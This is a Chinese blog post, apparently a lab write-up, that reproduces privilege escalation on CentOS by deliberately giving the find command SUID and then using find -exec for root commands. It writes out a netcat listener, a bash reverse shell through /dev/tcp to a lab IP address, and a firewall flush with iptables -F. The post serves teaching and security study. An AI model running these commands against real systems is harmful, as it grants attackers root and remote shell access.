centos利用find提权反弹shell

最新推荐文章于 2024-07-01 08:52:37 发布
最新推荐文章于 2024-07-01 08:52:37 发布
阅读量1k 收藏
点赞数 1
分类专栏: 安全 linux 文章标签: linux 运维 服务器 web安全 安全 find shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/134385914
版权
安全 同时被 2 个专栏收录
155 篇文章 10 订阅
订阅专栏
linux
44 篇文章 4 订阅
订阅专栏

需要说明的是利用find命令进行提权的方式已经不存在了,因为Linux默认不会为find命令授予suid权限,这里只是刻意的制造出了一种存在提权的环境

首先我们先介绍一下find命令,find命令主要用来在Linux中查找文件使用,它可以进行最基础的打印操作,还可以根据文件的名称、类型、事假戳、大小、权限等来查找指定的文件。

利用find反弹shell实现提权主要依靠的就是find命令如果有suid的权限,那么在执行find命令的一瞬间会拥有root权限,又因为find命令可以使用执行的操作,所以有很大的危害。

那么我们现在就复现一下:
(1)首先可以查看一下find命令的权限

ls -al /usr/bin/find

可以看到并没有suid(s)权限

(2)那么我现在手动的为find授予suid的权限

chmod  u+s /usr/bin/find

我们再查看find的权限就会发现它已经有了s权限

(3)因为我现在还是在root用户下,始终是root权限,无法观察find命令提权的过程,我现在切换到一个普通的用户下:

su user1

(4)那么现在就可以测试一下find命令执行时会不会提升到root权限

find /etc/passwd -exec whoami \;

可以看到这里和我设想的一样,在find命令执行的一瞬间是root权限

 (5)那么这是我在另一台centos对12345端口进行监听

nc -lvvp 12345

(5)这时我尝试在centos1上执行操作,尝试进行反弹shell

find  /etc/passwd -exec bash -ip >&/dev/tcp/192.168.159.201/12345 0>&1 \;

 可以看到并没有成功,难道因为我们没有到192.168.159.201的路由吗,我们可是一个网段呀,那我就用ping命令看看

很明显可以ping通呀,那为什么在尝试执行时会报错说没有路由呢

(6)我想会不会是因为防火墙的原因,于是我在两台主机上都清除了防火墙的规则

iptables -F

(7)然后再次尝试

可以看到centos1成功的利用find的这样一个漏洞反弹到了centos2的shell

(8)我们可以查看一下ip地址看看是否为centos1

可以看到这就是我的centos1设备的ip地址

到这里使用find来实现反弹shell的漏洞就复现完成了

注:给find增加suid增加只是为了实验,记着做完实验后去除find的suid权限

chmod u-s /usr/bin/find

未知百分百
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CentOS 5.5提权exp
03-20
CentOS 5.5提权exp
shell_findit
05-20
编写一个Shell程序findit,该程序搜索参数1指定的目录树,查找所有的以.c和.h结尾的文件,如文件行中含有参数指定的字符串,显示该行和相应的文件名。如目录参数1缺省,则从当前目录中搜索。如:findit /home/wang/work searchstring 搜索以/home/wang/work为根的目录树中的c程序和头文件,查找含有searchstring字符串的行,显示文件名。
防止黑客利用脏牛漏洞提权CentOS 7系统的安全加固策略
weixin_43822401的博客
07-01 533
脏牛漏洞是由于Linux内核在处理写时复制(Copy-on-Write, COW)机制时的一个缺陷引起的。攻击者可以利用这个漏洞,通过精心构造的写操作,覆盖只读内存页,从而实现权限提升。
find命令提权反弹shell
a1ExT
08-28 167
拥有suid的程序发起的命令,命令所属不为发起该命令的用户所属,而是该程序所拥有的权限所属,也就是root。
shell编程学习】反弹shell
yuxuan89814的专栏
05-23 805
反弹shell实验及命令解析
linux find 命令详解
weixin_33766805的博客
08-09 226
功能说明:查找文件或目录。语  法:find[目录...][-amin<分钟>][-anewer<参考文件或目录>][-atime<24小时数>][-cmin<分钟>][-cnewer<参考文件或目录>][-ctime<24小时数>][-daystart][-depyh][-empty][-...
Linux入门–(centos 学习–find命令)
神隐哥的博客
12-29 1130
实例介绍find命令的操作
linux提权总结8大类型,30多种方式
09-27
这些方法涵盖了内核提权、服务提权、sudo提权、suid提权、sgid提权、定时任务提权和nfs提权等。 1. **内核提权** - 内核提权通常涉及利用内核中的漏洞来获得更高的权限。一种常见的方法是通过所谓的“脏牛”漏洞...
提权学习之旅——Linux操作系统提权
Lemon's blog
08-19 2987
前言: 上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权 Linux提权基础 0x00:Linux提权方法 大致归纳总结如下:
系统提权之:Unix 提权
f_carey的博客
08-28 920
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
Linux提权的几种常用方式
热门推荐
01-04 4万+
在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就...
Linux 提权的各种姿势总结
墨痕诉清风的博客
03-04 252
1、利用内核栈溢出提权1.1 信息收集uname -a内核版本 3.10.0, CPU 架构 x86_64在我的虚拟机 CentOS 执行时,发现存在脏牛提权漏洞2、明文 root 密码提权passwd 储存了用户,全用户可读,root 可写shadow 存储密码的 hash,仅 root 可读写passwd 文件:daemonpasswd 由冒号分割,第一列是用户名,第二列是密码,x 代表密码 hash 被放在 shadow 里面了(这样非 root 就看不到了)。...
shell ——find
七月尘上
07-12 607
背景知识 IP地址IP地址被用来给Internet上的电脑一个编号。大家日常见到的情况是每台联网的PC上都需要有IP地址,才能正常通信。我们可以把“个人电脑”比作“一台电话”,那么“IP地址”就相当于“电话号码”,而Internet中的路由器,就相当于电信局的“程控式交换机”。 IP地址是一个32位的二进制数,通常被分割为4个“8位二进制数”(也就是4个字节)。IP地址通常用“点分十进制”表示成
shell-find
学习,思考,记录
07-11 598
#!/bin/sh echo "(use -mount)" find ./ -mount -name temptest -print echo "(use -newer,include directory) " find . -newer trapfile_5238 -print echo "(use -newer -type f,not include directory ) " find
shell】 find
lbt_dvshare的博客
05-30 708
find [path...] [expression]   path:find命令所查找的目录路径 expression:expression可以分为“-options [-print -exec -ok...]”  -options,指定find命令的常用选项; -print,find命令将匹配的文件输出到标准输出; -exec,find命令对匹配的文件执行该参数所给出的shell命令...
SUID提权(find配置不当)
ljj20020718的博客
07-19 256
备份passwd文件,使用openssl passwd生成一个密码,再使用python搭建一个http服务,然后使用本地物理机下载passwd备份文件。在本地使用python开启http服务并将passwd备份文件放到该目录下,使用wget -0下载该备份文件并覆盖原有的passwd文件。suid权限解释:当文件被设置了suid权限后表示该文件被执行时会将当前的用户权限暂时切换为文件所有者的权限(所有者一般为root)发现find命令,使用find的-exec参数将wget命令也增加suid权限。
shell的find命令
因热爱而执着,因执着而成功。
01-22 3057
转自:http://www.linuxsir.org/main/node/137 前言:关于find命令 由于find具有强大的功能,所以它的选项也很多,其中大部分选项都值得我们花时间来了解一下。即使系统中含有网络文件系统( NFS),find命令在该文件系统中同样有效,只你具有相应的权限。 在运行一个非常消耗资源的find命令时,很多人都倾向于把它放在后台执行,因为遍历一个
shell脚本之find
Doudou_4174的博客
03-29 7738
shell脚本之find ​ 实时查找工具,通过遍历指定路径下的文件系统完成文件查找。 ​ find命令的工作方式如下:沿着文件层次结构向下遍历,匹配符合条件的文件,执行响应的操作。 语法:find [options]… [查找条件][处理动作] ​ 查找路径:指定具体的目标路径,默认为当前目录。 ​ 查找条件:指定的查找标准,可以是文件名、大小、类型、权限等,默认为找出指定路径下的所有文件。 根据文件名查找 ​ -name “文件名称”:支持通配符查找; ​ -iname “文件名称”:不区分文件名大
shell find用法
sidely的专栏
09-25 1118
find命令的一般格式: find pathname -options [-exec] pathname 是find命令所查找的目录路径 -exec 对匹配的文件执行该参数所给出的shell命令 -options 选项参数: -name 按照文件名查找文件 -perm 按照文件权限来查找文件 -user 按照文件属主来查找文件 -group 按照文件所属组来查找文件 -mti
centos无法提权
最新发布
09-04
CentOS 提权是指通过某种手段获取系统管理员权限的过程,通常在Linux服务器管理中,如果需要对系统进行高级配置或者安全操作,可能会需要root权限。但是,在 CentOS 系统中遇到无法提权的情况,可能是由于以下几个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值